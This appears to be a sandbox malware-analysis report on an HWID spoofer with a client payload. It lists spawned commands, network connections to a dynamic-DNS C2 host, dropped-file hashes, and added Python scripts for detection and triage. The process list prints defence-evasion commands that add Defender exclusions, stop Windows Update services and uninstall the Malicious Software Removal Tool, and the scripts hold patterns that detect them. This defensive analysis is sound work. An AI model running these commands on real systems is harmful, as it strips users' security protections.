C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: 9U35-0TJ9

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: 9U35-0TJ9

C:\ProgramData\VC_redist.x64.exe

C:\ProgramData\VC_redist.x64.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: ED8I-JG46

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: ED8I-JG46

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: HI6V-FLNM

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: HI6V-FLNM

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: 3MG1-LPM1

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: 3MG1-LPM1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: 5OID-I6E4

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: 5OID-I6E4

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: I75N-FRZC

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: I75N-FRZC

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: KO8Z-OEZ1

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: KO8Z-OEZ1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: ZDOC-BT66

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: ZDOC-BT66

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: NVKV-9KBJ

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: NVKV-9KBJ

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: N28T-B91O

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: N28T-B91O

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: KPPR-9I8R

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: KPPR-9I8R

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: RLKL-STNJ

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: RLKL-STNJ

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 4G61-O3S9

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 4G61-O3S9

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 4VA6-VHUD

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 4VA6-VHUD

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: C2EU-LHH0

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: C2EU-LHH0

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: DK4V-OGG2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: DK4V-OGG2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: 75VK-CPEA

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: 75VK-CPEA

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: 4398-NFSD

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: 4398-NFSD

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 66DN-BEGB

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 66DN-BEGB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys
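The process list above is a recognisable chain: Volumeid64.exe (the Sysinternals VolumeID utility) rewrites the volume serial of every drive letter from g: to z:, powercfg sets every standby and hibernate timeout to 0 (never), sc.exe stops the Windows Update path (dosvc is Delivery Optimization, bits, wuauserv, WaaSMedicSvc, UsoSvc is the Update Orchestrator), wusa removes KB890830 (the Malicious Software Removal Tool), and a final series of del commands removes the SMBIOS/DMI editing tooling (AMIDEWINx64.exe with its amifldrv64.sys and amide.sys drivers, NirSoft's DevManView and Disk.bat) so the staging directory looks clean. No single one of these commands is malicious on its own; the signal is several of them from the same parent in a short window. The following detection logic is an added example, not part of the sandbox report or of any vendor rule set: the command lines in SAMPLE_EVENTS are copied from the report, but the parent PIDs and timestamps are invented because the report does not record them.

```python
"""Correlate the HWID-spoofer / update-kill command chain by parent process.
Added example; event records are constructed (see lead-in)."""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    ts: float      # seconds since first event (constructed)
    ppid: int      # parent process id (constructed)
    cmdline: str   # copied from the report


# Delivery Optimization, BITS, Windows Update, WaaS Medic, Update Orchestrator
UPDATE_SERVICES = {"dosvc", "bits", "wuauserv", "waasmedicsvc", "usosvc"}

RULES = {
    # VolumeID syntax is "<drive>: XXXX-XXXX"; the cmd /C wrapper line matches too
    "volume_serial_rewrite": re.compile(
        r"volumeid(?:64)?\.exe\s+[a-z]:\s+[0-9a-z]{4}-[0-9a-z]{4}\b", re.I),
    "sleep_disabled": re.compile(
        r"powercfg(?:\.exe)?\s+/x\s+-(?:standby|hibernate)-timeout-(?:ac|dc)\s+0\b", re.I),
    # KB890830 is the Malicious Software Removal Tool package
    "msrt_uninstalled": re.compile(
        r"\bwusa(?:\.exe)?\b.*/uninstall\b.*/kb:890830\b", re.I),
    "spoofer_tool_cleanup": re.compile(
        r"\bdel\s+\S*(?:AMIDEWIN\S*\.exe|amifldrv64\.sys|amide\.sys|DevManView\.\w+|Disk\.bat)\b", re.I),
}
SC_STOP = re.compile(r"\bsc(?:\.exe)?\s+stop\s+(\S+)", re.I)


def classify(cmdline):
    """Return the set of technique labels a single command line matches."""
    hits = {label for label, rx in RULES.items() if rx.search(cmdline)}
    m = SC_STOP.search(cmdline)
    if m and m.group(1).lower() in UPDATE_SERVICES:
        hits.add("update_service_stopped")
    return hits


def correlate(events, window=120.0, min_techniques=3):
    """Group hits by parent PID and alert on any parent showing at least
    min_techniques distinct techniques inside a sliding window of `window`
    seconds. A lone 'sc stop bits' from an admin script never alerts."""
    by_parent = defaultdict(list)
    for e in events:
        for label in classify(e.cmdline):
            by_parent[e.ppid].append((e.ts, label))
    alerts = {}
    for ppid, hits in by_parent.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            labels = {label for t, label in hits[i:] if t - t0 <= window}
            if len(labels) >= min_techniques:
                alerts[ppid] = labels
                break
    return alerts


SAMPLE_EVENTS = [  # constructed records: report command lines, invented PIDs/times
    ProcEvent(0.0, 1001, r'"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: HI6V-FLNM'),
    ProcEvent(0.2, 1001, r"C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 66DN-BEGB"),
    ProcEvent(1.0, 1001, r"C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0"),
    ProcEvent(1.5, 1001, r"C:\Windows\system32\sc.exe stop wuauserv"),
    ProcEvent(2.0, 1001, r"wusa /uninstall /kb:890830 /quiet /norestart"),
    ProcEvent(3.0, 1001, r'"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys'),
    ProcEvent(4.0, 2002, r"sc stop bits"),   # single technique from another parent
]

if __name__ == "__main__":
    for ppid, techniques in correlate(SAMPLE_EVENTS).items():
        print(f"parent PID {ppid}: {sorted(techniques)}")
```

To run this over real telemetry, build ProcEvent records from Sysmon Event ID 1 (ParentProcessId, CommandLine, UtcTime) or Security 4688 with command-line auditing enabled; the parent-PID correlation is what keeps the individual rules, each of which has legitimate uses, from paging anyone on their own.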

Network

Country  Destination           Domain                          Proto
US       20.231.121.79:80      -                               tcp
US       8.8.8.8:53            158.240.127.40.in-addr.arpa     udp
US       8.8.8.8:53            241.154.82.20.in-addr.arpa      udp
US       8.8.8.8:53            62.179.17.96.in-addr.arpa       udp
US       8.8.8.8:53            19.53.126.40.in-addr.arpa       udp
US       8.8.8.8:53            22.177.190.20.in-addr.arpa      udp
US       8.8.8.8:53            86.23.85.13.in-addr.arpa        udp
US       8.8.8.8:53            brofisthej.ddns.net             udp
SE       2.70.186.204:4822     brofisthej.ddns.net             tcp
US       8.8.8.8:53            204.186.70.2.in-addr.arpa       udp
US       8.8.8.8:53            41.110.16.96.in-addr.arpa       udp
US       8.8.8.8:53            55.36.223.20.in-addr.arpa       udp
US       8.8.8.8:53            15.164.165.52.in-addr.arpa      udp
US       8.8.8.8:53            217.135.221.88.in-addr.arpa     udp
US       8.8.8.8:53            ipwho.is                        udp
DE       195.201.57.90:443     ipwho.is                        tcp
US       8.8.8.8:53            tse1.mm.bing.net                udp
US       204.79.197.200:443    tse1.mm.bing.net                tcp
US       204.79.197.200:443    tse1.mm.bing.net                tcp
US       204.79.197.200:443    tse1.mm.bing.net                tcp
US       204.79.197.200:443    tse1.mm.bing.net                tcp
US       204.79.197.200:443    tse1.mm.bing.net                tcp
US       8.8.8.8:53            90.57.201.195.in-addr.arpa      udp
US       8.8.8.8:53            11.227.111.52.in-addr.arpa      udp
US       8.8.8.8:53            56.179.17.96.in-addr.arpa       udp
US       8.8.8.8:53            35.197.79.40.in-addr.arpa       udp
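Most rows in the Network table are resolver traffic to 8.8.8.8:53, and most of those are reverse (in-addr.arpa) lookups the sandbox host performs for the connections it sees, so they carry no indicator value. What is left after filtering is the dynamic-DNS name brofisthej.ddns.net resolving to 2.70.186.204 with a TCP session on port 4822 (the C2 candidate), a TLS connection to ipwho.is (an IP-geolocation lookup, consistent with the "Checks computer location settings" signature), and Microsoft background traffic to tse1.mm.bing.net. The script below performs that triage; it is an added example, not part of the report. The embedded rows are a subset copied from the table, and the dynamic-DNS suffixes, lookup-service hosts and background allowlist are assumptions to tune per environment.

```python
"""Triage the sandbox 'Network' table into C2 candidate, recon, background
and other. Added example; rows are copied from the report, lists are assumed."""
from collections import OrderedDict
from dataclasses import dataclass

NETWORK_ROWS = """\
Country Destination Domain Proto
US 20.231.121.79:80 tcp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 brofisthej.ddns.net udp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
US 8.8.8.8:53 204.186.70.2.in-addr.arpa udp
US 8.8.8.8:53 ipwho.is udp
DE 195.201.57.90:443 ipwho.is tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
"""

RESOLVER = ("8.8.8.8", 53)
DYNDNS_SUFFIXES = (".ddns.net", ".no-ip.org", ".duckdns.org")   # assumption
IP_LOOKUP_HOSTS = {"ipwho.is", "api.ipify.org", "ip-api.com"}    # assumption
BACKGROUND_SUFFIXES = (".bing.net",)                              # assumption
COMMON_PORTS = {80, 443}


@dataclass(frozen=True)
class Flow:
    country: str
    ip: str
    port: int
    domain: str   # "" when the report left the Domain column empty
    proto: str


def parse_rows(text):
    """Parse the 3- or 4-column rows of the report's Network table."""
    flows = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] == "Country":
            continue
        if len(parts) == 3:            # Domain column empty
            country, dest, proto = parts
            domain = ""
        else:
            country, dest, domain, proto = parts
            if domain == "-":
                domain = ""
        ip, _, port = dest.rpartition(":")
        flows.append(Flow(country, ip, int(port), domain.lower(), proto.lower()))
    return flows


def triage(flows):
    """Bucket each non-DNS flow. Returns category -> ordered unique strings."""
    out = OrderedDict((k, []) for k in ("c2_candidate", "recon", "background", "other"))

    def add(cat, item):
        if item not in out[cat]:
            out[cat].append(item)

    for f in flows:
        if (f.ip, f.port) == RESOLVER:
            continue                    # DNS queries; the PTR noise lives here
        endpoint = f"{f.ip}:{f.port}/{f.proto}"
        port_note = "" if f.port in COMMON_PORTS else " [non-standard port]"
        if f.domain.endswith(DYNDNS_SUFFIXES):
            add("c2_candidate", f"{f.domain} -> {endpoint} ({f.country}){port_note}")
        elif f.domain in IP_LOOKUP_HOSTS:
            add("recon", f"{f.domain} -> {endpoint}")
        elif f.domain.endswith(BACKGROUND_SUFFIXES):
            add("background", f.domain)
        else:
            add("other", f"{f.domain} -> {endpoint}" if f.domain else endpoint)
    return out


def dns_queries(flows):
    """Names the sample asked the resolver for, minus reverse lookups."""
    return sorted({f.domain for f in flows
                   if (f.ip, f.port) == RESOLVER and not f.domain.endswith(".in-addr.arpa")})


if __name__ == "__main__":
    flows = parse_rows(NETWORK_ROWS)
    print("queried:", dns_queries(flows))
    for cat, items in triage(flows).items():
        for item in items:
            print(f"{cat:13s} {item}")
```

The "other" bucket (here the bare 20.231.121.79:80 connection with no recorded domain) is where the list of unknowns goes for manual lookup; the point of the exercise is that the C2 candidate and the recon call come out as two lines instead of being buried in twenty-odd PTR queries.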

Files

memory/4368-0-0x0000000074E70000-0x0000000075421000-memory.dmp

memory/4368-1-0x0000000074E70000-0x0000000075421000-memory.dmp

memory/4368-2-0x0000000000FF0000-0x0000000001000000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\svchost.exe

MD5 66fa626b4bce82ab7092a3ecc9e26464
SHA1 28c23acab5bb0798bd658bc0c1b6ee58b62e127f
SHA256 34d1668bec7850f9f65281717de74c63beb102c827908392d7ff60796016343b
SHA512 d4e3e0021c9346c55e290c0e1bdb50fd5e05eca2d3e758212aa109b033934c58cd06812e6793501bbe4a8c46d78d5483ed5e52c91251efb50147b144903a8b85

C:\Users\Admin\AppData\Local\Temp\svchost.exe

MD5 d3650464ce69bdf60f50afce833ba111
SHA1 7fed397d46da661cf80f45a78c437b98b6d2831c
SHA256 f13a3314d5b03838ae32af4bc7bb05c26d1c1f4e0de17c6e37d99aa49caee426
SHA512 eda61f16863c20a61114a9f5e8454781c848e260c32b53c718ed516e35d9283f08f06f07df73a323d1f723dde520526039f1b8f423ab0aaea5cccf2375a3ee33

C:\Users\Admin\AppData\Local\Temp\svchost.exe

MD5 713edbdf65816ce84a5ce75aa7ac3ad3
SHA1 d276e95994a39b413ed2b629209cb3dbc802136b
SHA256 823a9384f27d331a9e7991243bb0dd3115aac8bf3f98515cb8788d4f1ae78c2e
SHA512 522a1c5870190f16b411c25fa808d6a0991e74685c4f9273848645290087e9eb664a96141208c7c3a872587bae77e6c7be27752fa9174fc21f86c8de00889f79

memory/720-14-0x0000000000F50000-0x0000000001274000-memory.dmp

memory/720-15-0x00007FFC12DC0000-0x00007FFC13881000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe

MD5 723e825804762facdfbaebbf60cbb674
SHA1 a357f06c7f787c5dc4cd1cf8b9d65b9f45480c2a
SHA256 044c101b3d148d5163eed4250fcdde3aab86464e6989f37c8c2cbfe22afb1acc
SHA512 e8f8d65d6b91c852e28ee79a0f48ed10223c046ba86f1683de2277b17092e6c08f26c74a3a1b76cec5eb69b68c144328e4993caabe778fe9eae767e23f1dcfc4

C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe

MD5 305bdeb79f8c6a2ec5488e693073d941
SHA1 6144777c72d2d67caf1b6b66b7916faea48f67c0
SHA256 8db2fd4cddaaeef002c3e518a62c8045fc9665b8e1114f238b21df72bed9b343
SHA512 e0cbb9264fbd63728239087d9ad34c86e296b218b5af4daedb98568553c069ad026f97deb552e1d852f93c3ee9e886d38bd9efd11d4c65c5ef069662365221eb

C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe

MD5 34223d88b2dc739c79332bf4b9ac5673
SHA1 6954054728a6c7eaa9b3cc6b449324a678588167
SHA256 99fb81c5a8578e26009322ca9696e4fc491b935dd93f8adaae32989d22d4e869
SHA512 f9e14c207f9fb351a642bf1e48d1667ce440488a56ff76953cc35500bcf0d2fdcf8aa7857a75b8f930c6becbcdb03c8e8d4656ee203626a8d56bce7cd963bef8

memory/4368-28-0x0000000074E70000-0x0000000075421000-memory.dmp

memory/2192-29-0x0000000000400000-0x0000000001274000-memory.dmp

memory/2192-30-0x000000007FA70000-0x000000007FE41000-memory.dmp

C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe

MD5 5f1caa7064b3cd10dce90ad8d05c40d8
SHA1 1d2e542a6644ae4b74928af176a7d172b6a906c5
SHA256 2cf9d501a2707d1ac789f48a11df829cdf9be6ec55606f9764ef718e6d7d4a05
SHA512 43fc031ec8224a226a88b426e96b1cc185bf51c561c303c46da2b8f88a76a6354079a97f52523e925b5c8d2772a0484bde22283f4ae259a68ad8f36c1e64e077

C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe

MD5 fcebbed65850b574d85c480598572622
SHA1 6766b0ea9015d174bbb412ebc533cff1a43322db
SHA256 ddcf5e9c3cc82f4ac80acc9f2d69397574daf3521f2ea550d8a485a5f11b11c4
SHA512 6ab205d01191f8623cad01cd000292d98538c68d0db4ac38e476b3afb0fe13da45f3ef73b9b49a1dc868e9e2996e33f926ee429e7569fe420cd49a1bd41a8440

C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe

MD5 717959ed2769e3f1b7f44a676677e144
SHA1 9e3dee726a699fda88ac85f30443202c16d41c7e
SHA256 b2ec811dc3efc55eaaf25f4e6850b11ff656ebb9c3a5a7a7c3e7e4580f9622a0
SHA512 452f3c416cc2ae19ee63374bfe57ffd1ba37c63fde1b1dbff22dd6963a1a294713b74953ecc2d77b9a1f09762ef825a1ffcbf2808dc4f10054c01f36955276e1

C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe

MD5 063e00d709dd8afe815123b6fd8087cc
SHA1 812cc71d9b8af78d34bffa937870fe9632f97c98
SHA256 f11c459c9b47e250943a74cbd2fd662917c8eaf2cefdb439d165f0b64653044f
SHA512 1f711be8b3c66f09ce1c77dc0b6f3d258e0cafffad2925b56353bac78fc92449ec6e3254612616e575914203a8e9c5d7a6dc96b1dbb6f4d3d0eea8b37152fc85

C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe

MD5 df98dd1232971341b4781f5a7525774c
SHA1 c04024b07ecdb4f213b1b8236d497fffd4d2b307
SHA256 d3bd6f91c60444b3cfdf63f2ab2996b4c24abc15052693c11ecc9f14c9fddcac
SHA512 e6e04b4a8b505ecc6a2914095630b7119792703fc52a51d695f9a921df9cdc1eb354b20186287049f68ac230418ede1aabf1c594b3cc00cd959a00bf6cf95d1a

memory/2760-57-0x00000000006E0000-0x00000000007CA000-memory.dmp

C:\Users\Admin\AppData\Roaming\conhost_sft.exe

MD5 97db1fc64a189721a25cfa12ffa46e11
SHA1 d6e81c606f30405e9bc15b5c130d7ce7599b2811
SHA256 8bb069abd46b402f69c1f0ba3bd8a0d36637e8ede490637fd3a95211fc038037
SHA512 b39e87910236207e9b773c0b5e9efd91888d0dfd7e6085cc5c238ef32421b94b9521f81c277a04e44d05e58e873ae5fd275c597751f723392774a593cbb35d4f

C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe

MD5 53fc5532eff1554d002dd16f2e2f68d2
SHA1 c53936133df8feabca0e8b90f841dbe1b847b1a1
SHA256 fb6c693fd1a75e18c45a84184c1ead7853ab4f751459a08ae4126d5e1c00e70f
SHA512 1d516534175239a05e753e67b036f8001c9bfa3b7ed0a0798ddb55a56489a3bce5e28aa48858dc00be5824eebc8087dfa11ea64c036d19f55cfe0adb6b925c62

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

MD5 16fe4a11d4e2fa589fb75fa74390ab76
SHA1 6971282ae6d78967b67d75eccdf9110797f7640b
SHA256 88651fde7e9bbe60fbc6684d60831d0cce118383d06b5b224454b555e9de4e45
SHA512 b85a9388b84a9e48136596cf651867c870dd836c4a97fb018d070ebeefa4369177817f03de73aa4d0ac5d1ea95f9af5f0e30284b0ea030e6a33e8ac70267d5c0

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

MD5 4949aea9e9235198da71c92eb2b0a16a
SHA1 92f173f525217806b2b4d6b2cd84a3ca9337b105
SHA256 a38dd7f9620f9dd86a65cb0bd50631faff5c33bd68fdd95e1c4d195d55aa5058
SHA512 b2f3ca8c480129daa360542dd63fa4fd81f6d12a52b87d533eac488a5280f3d056d4391cbb8effebeb8aaa62bcfef2f319743edb5c1076b8fb4b257f7bb84385

memory/1948-70-0x0000000073440000-0x0000000073BF0000-memory.dmp

memory/720-82-0x00007FFC12DC0000-0x00007FFC13881000-memory.dmp

memory/1948-81-0x00000000048F0000-0x0000000004926000-memory.dmp

memory/2440-84-0x00007FFC12DC0000-0x00007FFC13881000-memory.dmp

memory/1948-86-0x00000000049A0000-0x00000000049B0000-memory.dmp

memory/2440-87-0x000000001B050000-0x000000001B060000-memory.dmp

memory/1948-85-0x0000000004FE0000-0x0000000005608000-memory.dmp

memory/2760-89-0x0000000000F80000-0x0000000000F8E000-memory.dmp

memory/2760-91-0x00007FFC31760000-0x00007FFC31761000-memory.dmp

memory/2760-90-0x00007FFC31770000-0x00007FFC3182E000-memory.dmp

memory/2192-83-0x000000007FA70000-0x000000007FE41000-memory.dmp

memory/2760-93-0x0000000000FD0000-0x0000000000FEC000-memory.dmp

memory/2760-94-0x00007FFC31750000-0x00007FFC31751000-memory.dmp

memory/2192-65-0x0000000000400000-0x0000000001274000-memory.dmp

memory/2760-64-0x000000001B430000-0x000000001B440000-memory.dmp

memory/2760-98-0x0000000000FF0000-0x0000000001008000-memory.dmp

memory/2760-96-0x000000001B300000-0x000000001B350000-memory.dmp

memory/2760-99-0x00007FFC31740000-0x00007FFC31741000-memory.dmp

memory/2760-103-0x00007FFC31730000-0x00007FFC31731000-memory.dmp

memory/2760-106-0x0000000000FB0000-0x0000000000FBE000-memory.dmp

memory/1948-104-0x0000000005870000-0x00000000058D6000-memory.dmp

memory/2760-107-0x00007FFC31720000-0x00007FFC31721000-memory.dmp

memory/2760-117-0x00007FFC31710000-0x00007FFC31711000-memory.dmp

memory/1948-116-0x00000000058E0000-0x0000000005C34000-memory.dmp

memory/2760-123-0x0000000001010000-0x000000000101E000-memory.dmp

memory/2760-115-0x0000000000FC0000-0x0000000000FCC000-memory.dmp

memory/2760-126-0x0000000001070000-0x000000000107C000-memory.dmp

memory/2760-127-0x00007FFC31700000-0x00007FFC31701000-memory.dmp

memory/2760-129-0x00007FFC316F0000-0x00007FFC316F1000-memory.dmp

memory/2760-130-0x000000001B430000-0x000000001B440000-memory.dmp

memory/2440-131-0x00007FFC12DC0000-0x00007FFC13881000-memory.dmp

memory/1948-128-0x0000000073440000-0x0000000073BF0000-memory.dmp

memory/2760-124-0x00007FFC12DC0000-0x00007FFC13881000-memory.dmp

memory/2760-113-0x000000001B430000-0x000000001B440000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t0tyeznn.4yv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1948-102-0x0000000005800000-0x0000000005866000-memory.dmp

memory/2760-101-0x0000000000F90000-0x0000000000F9E000-memory.dmp

memory/1948-95-0x0000000004F00000-0x0000000004F22000-memory.dmp

C:\Users\Admin\AppData\Roaming\conhost_sft.exe

MD5 620878bb7e842d87ea941ce735ddc8b1
SHA1 9da839ba3ccc3ee1ffc34ab4a1e308d1f9ae44eb
SHA256 e0a234ba0013256d2644a755d45c71af2293860f3f1c34bbd1c5652185162add
SHA512 cc468a90d56eca5d591b3538cf6795ad7d8a0eba689a4a1b651138c3539ebdb8f005ea7e8e04641a6a4e2e33f731024b122e7a4ea8bd81419045556ce06f3ce3

C:\Users\Admin\AppData\Roaming\conhost_sft.exe

MD5 e1b3adb31655e45a5ebe6fba5b11686e
SHA1 76e9ab62559fa7ce7d8d901c169d16b56da436a0
SHA256 b8efc69c2a9cf69088edaaa271e213c7b84d3e9817c0e6af411ffc832747bab8
SHA512 3e2101b4f98791f2975143535e50b6d325147feffe25a72a714281a7bc85e1a755c252ae90490553a758495ea41125106cc1f2335e2a7958a96f9bc1bdd12e05

memory/2760-58-0x00007FFC12DC0000-0x00007FFC13881000-memory.dmp

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

MD5 da12b0616d6187f2e88d3afafdd4b1d6
SHA1 3b08e3278ae88dbfefac8aea01ddf79c7d9a3434
SHA256 2429f75260b54f2211274f0fc0fef3734e06799172128b7632d50d60a9837794
SHA512 192ca1143dfa7ea0bce94df826ed743458ced6860f5383bf44aea17eb6f29773e9e12210438cca9b0674e2ab4b31edff2b085ebce076b7310199e78a7c141010

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

MD5 f4eabe7dfdd3950984b4bf78be40c5d8
SHA1 428f09f93dfdb1c540612ecb010af2344863eec4
SHA256 a4cd5ea4203f9320c18499adbc2d49660ac1a533fda98ab5d2d4b3fc1e154bb8
SHA512 0fe8f48ef2d1e1046831d5da1d0dcecf5ca03b3d9bae6e14614d62a8039b8098002b372db7d2137a366a4bdb7c1c211ee3ec69db5361f7cc52911228f7d9b726

memory/1948-135-0x00000000049A0000-0x00000000049B0000-memory.dmp

memory/2760-136-0x000000001B430000-0x000000001B440000-memory.dmp

